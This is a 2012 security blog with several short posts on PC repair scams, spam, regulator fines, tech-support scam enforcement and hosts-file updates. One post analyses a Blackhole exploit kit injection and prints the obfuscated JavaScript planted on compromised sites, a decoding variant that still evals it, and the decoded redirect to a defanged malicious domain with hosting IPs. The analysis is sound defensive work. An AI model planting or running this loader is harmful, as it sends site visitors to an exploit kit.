Blog for hpHosts, and whatever else I feel like writing about ....

Thursday 18 October 2012

BBC Watchdog crew sink teeth into dodgy PC repair shops

The reputation of the UK's computer repair industry took another hammering last week following a BBC Watchdog investigation into two Worcestershire-based computer repair firms.

The flagship consumer affairs programme looked into Click 4 PC and Click Computers in response to reports from viewers about missing personal data, botched repairs and a computer being held to ransom. The subsequent investigation into Click 4 PC exposed dubious practices including false diagnosis of faults, alleged supply of illegal software and passing off used equipment as being new.


Read more
http://www.channelregister.co.uk/2012/10/18/pc_repairs_watchdog_probe/

References

Peeping Tom Mac spyware suspect cuffed
http://www.theregister.co.uk/2011/06/09/peeping_tom_mac_malware/

Micro Chip Computers: A lesson in losing customers
http://hphosts.blogspot.co.uk/2010/02/micro-chip-computers-lesson-in-losing.html

PC repair shop caught trying bank fraud
http://www.channelregister.co.uk/2009/07/22/dodgy_pc_repair_survey/

Monday 15 October 2012

Dear pkware.com, STOP SPAMMING!

Ever since InfoSec, I've been getting spam from PKware.com, despite several emails to them politely asking them not to, and despite clicking their unsubscription link, which is rather hilarious in itself, given I never subscribed in the first place (I don't normally click unsubscription links if I've never subscribed in the first place; I only did in this case because I knew where they got the address - InfoSec (the InfoSec chaps forgot to mention that the companies scanning your ID card at InfoSec would be getting your email address and other details, in order to spam you!)).

Though I doubt they read this, and despite having already blacklisted them (added them to hpHosts with the GRM classification), I'm hoping this will finally put a stop to it (well, I can dream ....).

Sunday 14 October 2012

Churchcastle Limited fined by regulator, Phonepayplus

UK premium-line regulator PhonepayPlus has slapped Churchcastle Limited with the largest fine it has dished to date, ruling the phone-quiz host guilty of misleading and bamboozling callers with impenetrable terms and conditions.

After it received 15 complaints, PhonepayPlus found Churchcastle guilty of targeting the elderly, keeping them hanging on the line at up to £1.53 a minute, inducing them to call back without explaining the costs properly, and then providing cheap prizes, all of which mounts up to a £800,000 fine and refunds to anyone who asks for one.

Churchcastle advertised its quiz line in various national papers, requiring players to complete a word search over the phone, but according to the regulator that call was just the hook with which marks were snagged.


Read more
http://www.theregister.co.uk/2012/10/12/phonepayplus_fine/

Friday 12 October 2012

Outlook Export v0.1.11

I needed a little break from work, so decided to sort out a few things in Outlook Export.

First and foremost, the About dialog has been updated.

Secondly, v0.1.11 now includes a work-around for Runtime error 462 "The remote server machine does not exist or is unavailable".

Third, when exporting, duplicates are now removed (they were meant to have been anyway, but for some reason it was ignoring them; now it shouldn't).

Finally, the system requirements have finally been updated. Nothing new is required; it's just noting that it works with Outlook 2007 (I got quite a few emails asking me about it) and that it has been tested on both Vista and Windows 7.

Outlook Export
http://support.it-mate.co.uk/?mode=Products&p=outlookexport

Sunday 7 October 2012

ATTN: kcsoftwares.com

I recently had an e-mail from Kyle at kcsoftwares.com, regarding his site's listing in hpHosts.

Sadly, OVH are still blocking my emails, and as he used OVH for his mail server, my reply to his email got blocked as well (blocked emails to OVH show as a timeout when attempting to send the email to addresses using their mail server - rather annoying given other mail servers at least send a rejection notice).

No idea if he reads this (probably not), but he doesn't have a contact form on his site, so I figured this was the best option.

If you are reading this, Kyle, the reason for the site's listing is the adware (sponsor software) included in your programs' installers. The fact that there's an optional package available without it is irrelevant.

Friday 5 October 2012

hpHosts Updated: 05/10/2012

The hpHOSTS Hosts file has been updated. There is now a total of 184,831 listed hostnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)
Latest Updated: 05/10/2012 23:15
Last Verified: 04/10/2012 12:00

Download hpHosts now!
http://hosts-file.net/?s=Download

Thursday 4 October 2012

FTC launches international crackdown on tech support scammers

The Federal Trade Commission has launched a major international crackdown on tech support scams in which telemarketers masquerade as major computer companies, con consumers into believing that their computers are riddled with viruses, spyware and other malware, and then charge hundreds of dollars to remotely access and “fix” the consumers’ computers.

At the request of the FTC, a U.S. District Court Judge has ordered a halt to six alleged tech support scams pending further hearings, and has frozen their assets.

“The FTC has been aggressive – and successful – in its pursuit of tech support scams,” said FTC Chairman Jon Leibowitz. “And the tech support scam artists we are talking about today have taken scareware to a whole other level of virtual mayhem.”


Read more
http://www.ftc.gov/opa/2012/10/pecon.shtm

References

Called by 03339009119?
http://hphosts.blogspot.co.uk/2012/07/called-by-03339009119.html

Info: Ammyy now warning about telephony scams
http://blog.eset.com/2012/08/24/ammyy-warning-against-tech-support-scams

OfCom: Unsolicited Telesales Calls
http://consumers.ofcom.org.uk/tell-us/telecoms/privacy/

Note: OfCom URL updated as they seem to have taken down the original page on this

Telephony scams: Your machine told them it was infected? Really?
http://mysteryfcm.co.uk/?mode=Articles&date=18-01-2012

Malwarebytes: Telephony Scams: Can You Help?
http://blog.malwarebytes.org/news/2012/05/telephony-scams-can-you-help/

Eset: The Tech Support Scammer’s Revenge
http://blog.eset.com/2012/07/23/the-tech-support-scammers-revenge

Tuesday 2 October 2012

Blackhole exploit: Compromised sites

Looking at a recent case of a compromised site, I noticed something rather surprising - they're not even bothering to try and make the code difficult to decode. I'm pondering, of course, whether this is deliberate, due to the changes in v2.0 of the Blackhole exploit kit (others have already written about that [1] [2], so I won't go into it here), but even if that is the case, the choice of far less complex code on compromised sites is puzzling, to say the least.

In this case, the code inserted into the compromised site is (I've formatted it for readability)

v="v"+"a"+"l";
try
{
        faweb++
}
catch(btawetb)
{
        try
        {
                sbgesrb+325
        }
        catch(btawt4)
        {
                w=window;
                e=w["e"+v];
        }
}
if(1)
{
        f=new Array(118,96,112,49,60,50,57,58,8,118,96,112,50,60,116,97,113,47,59,9,103,102,39,116,97,113,47,61,60,116,97,113,48,41,31,121,100,110,97,117,108,99,110,115,44,108,110,97,97,115,103,111,109,59,34,103,114,116,111,56,47,46,109,110,107,103,110,100,96,97,120,115,110,96,114,111,113,44,114,116,56,56,47,54,48,46,100,111,113,115,109,46,106,105,109,105,115,46,97,111,107,115,109,109,44,112,103,110,34,58,123);
}
w=f;
s=[];
r=String;
x="j%";
for(i=0;-i+111!=0;i+=1)
{
        j=i;
        if(e&&(031==0x19))s=s+r.fromCharCode((1*w[j]+e(x+3)));
}
if(0x10==020)try
{
        gbrgbdf&236;
}
catch(asga)
{
e("if(1)"+s+"");}


To decode this, all you need to do is modify it as follows;

v="v"+"a"+"l";
e=eval;
f=new Array(118,96,112,49,60,50,57,58,8,118,96,112,50,60,116,97,113,47,59,9,103,102,39,116,97,113,47,61,60,116,97,113,48,41,31,121,100,110,97,117,108,99,110,115,44,108,110,97,97,115,103,111,109,59,34,103,114,116,111,56,47,46,109,110,107,103,110,100,96,97,120,115,110,96,114,111,113,44,114,116,56,56,47,54,48,46,100,111,113,115,109,46,106,105,109,105,115,46,97,111,107,115,109,109,44,112,103,110,34,58,123);
w=f;
s=[];
r=String;
x="j%";
for(i=0;-i+111!=0;i+=1)
{
    j=i;
    s=s+r.fromCharCode((1*w[j]+e(x+3)));
}
e(s); // hands the decoded script to eval - run this in Malzilla (or swap e(s) for console.log(s)) to view the result without executing it


Which gives us (I've defanged the URL, to stop it being auto-hyperlinked for those whose clients do that);

var1=49;
var2=var1;
if(var1==var2) {document.location="hxxp://onlinebayunator.ru:8080/forum/links/column.php";}
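
An added example (not part of the original post, and not Malzilla's code): the same decoding done statically in JavaScript, so the recovered script is never handed to eval(). The function names (decodeBlackholeLoader, defang, extractLocation) are my own; the byte array is the one from the injected script above.

```javascript
// Static decoder for the Blackhole loader shown above (added example).
// The only dynamic piece in the original, e(x+3) === eval("j%3"), is just
// j % 3, so each output character is simply codes[j] + (j % 3). Nothing
// here ever calls eval().
"use strict";

// Byte array copied verbatim from the injected script on the page.
const F = [118,96,112,49,60,50,57,58,8,118,96,112,50,60,116,97,113,47,59,9,103,102,39,116,97,113,47,61,60,116,97,113,48,41,31,121,100,110,97,117,108,99,110,115,44,108,110,97,97,115,103,111,109,59,34,103,114,116,111,56,47,46,109,110,107,103,110,100,96,97,120,115,110,96,114,111,113,44,114,116,56,56,47,54,48,46,100,111,113,115,109,46,106,105,109,105,115,46,97,111,107,115,109,109,44,112,103,110,34,58,123];

// Re-implements  s += String.fromCharCode(1*w[j] + eval("j%3"))  without
// eval. The loop bound "-i+111!=0" is just i < 111 (the array length), so
// the whole array is consumed; the (031==0x19) and (0x10==020) guards are
// always true in a real browser, so they are dropped here.
function decodeBlackholeLoader(codes, modulus = 3) {
  let out = "";
  for (let j = 0; j < codes.length; j++) {
    out += String.fromCharCode(codes[j] + (j % modulus));
  }
  return out;
}

// Defang URLs in the recovered script (same hxxp:// convention as the post)
// so the result is safe to paste into a report or blocklist ticket.
function defang(text) {
  return text.replace(/http(s?):\/\//gi, "hxxp$1://");
}

// Pull out the redirect target from the decoded script, if there is one.
function extractLocation(decoded) {
  const m = decoded.match(/document\.location\s*=\s*"([^"]+)"/);
  return m ? m[1] : null;
}

const recovered = decodeBlackholeLoader(F);
console.log(defang(recovered));
console.log("redirect target:", defang(extractLocation(recovered) || "(none)"));
```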


In this case, onlinebayunator.ru is residing at;

70.38.31.71 - AS32613 70.38.0.0/17 IWEB-AS - iWeb Technologies Inc.
202.3.245.13 - AS9471 202.3.245.0/24 MANA-PF-AP MANA S.A.
203.80.16.81 - ns1.myren.net.my - AS24514 203.80.16.0/21 MYREN-MY Malaysian Research & Education Network

Other domains known to have lived (most are now, thankfully, dead) or to still be living on these IPs include;

hpHosts, Malware Domain List and Malwarebytes Anti-Malware users will be pleased to know that the IPs/domains are already blocked.

Incidentally, onlinebayunator.ru was resolving to the following yesterday (1st October), and nope, I'm not surprised to see CB3ROB's IP space making an appearance either;

84.22.100.108 - mail.cyberbunker.com - AS34109 84.22.96.0/19 AS34109 CB3ROB Ltd. & Co. KG
190.10.14.196 - cb9.creationsbank.com - AS3790 190.10.0.0/17 RADIOGRAFICA COSTARRICENSE
203.80.16.81 - ns1.myren.net.my - AS24514 203.80.16.0/21 MYREN-MY Malaysian Research & Education Network

References

Malware Domain List - Malzilla
http://www.malwaredomainlist.com/forums/index.php?topic=218.0

Malzilla (open source)
http://malzilla.sourceforge.net

Next hpHosts release, VB2012

As some of you know, I've been in the US since September 24th for VB2012 and to visit the chaps and chapesses at the Malwarebytes HQ, and got back around midday on the 30th.

First and foremost, I'd like to say thank you to those involved in VB2012, as it was fantastic. Indeed, the only things I didn't like were the bleedin' heat (felt like I was melting) and the lack of both wifi and plug sockets on the planes (I had never been out of the UK before, and was terrified of flying (still am - it's not normal!!)).

I also got to meet a living legend in Dallas - Alex Eckelberry - and Marcelo Rivero, amongst a plethora of others (I'm rubbish with names, so, embarrassingly, I can't remember the names of half of them).

The presentation I went to Dallas to do with David Harley (Eset), Martijn Grooten (Virus Bulletin) and Craig Johnston (Independent researcher, formerly Sophos), went well, despite the nerves getting the better of me (was not only my first flight, but my first presentation too).

On the subject of the presentation, one of the things we focused on, besides what the telephony scam was all about (for those that didn't already know), was what could be done about it, and this included asking for more involvement, not only from the banks/financial institutions, law enforcement etc, but also from you - the security community, and most importantly, the public. If you'd like to get involved, please contact either myself, David, Craig or Martijn. The more help we can get, the better.

Due to my being away, the hpHosts release was delayed; it is now due to be published on October 5th. As always, the partial update is available for those that would like to use it. The easiest way of applying it is via programs such as HostsMan.